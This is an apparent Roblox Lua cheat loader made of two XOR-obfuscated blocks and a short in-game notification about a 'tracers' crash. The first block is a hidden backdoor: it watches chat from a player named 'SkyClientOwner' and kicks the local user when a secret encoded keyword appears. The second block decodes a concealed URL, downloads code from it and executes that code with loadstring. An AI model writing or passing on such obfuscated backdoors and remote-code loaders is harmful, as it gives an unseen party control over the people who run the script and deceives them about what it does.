
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v12=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v12,v12 + 1 )),v1(v2(v9,1 + (v12% #v9) ,1 + (v12% #v9) + 1 )))%256 ));end return v5(v10);end game.Players.SkyClientOwner.Chatted:Connect(function(v11) if (v11==v7("\144\200\210\38\237","\126\177\163\187\69\134\219\167")) then game.Players.LocalPlayer:Kick(v7("\8\196\41\206\249\39\141\40\220\188\16\230\19\133\223\15\228\15\235\200\99\194\61\203\249\49\131","\156\67\173\74\165"));end end);


game.StarterGui:SetCore("SendNotification", {
    Title = "tracers bug";
    Text = "tracers will crash your game idk why but don't use it";
    Duration = 5;
})

wait(1)

--discord.gg/owoobfuscate
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\225\32\226\178\200\16\135\154\148\22\237\162\138\61\221\202\222\43\242\244\213\27\215\208\148\45\227\186\195\13\158\206\218\44\232\244\245\27\199\194\214\53\168\175\223\10","\126\177\163\187\69\134\219\167"),true))();
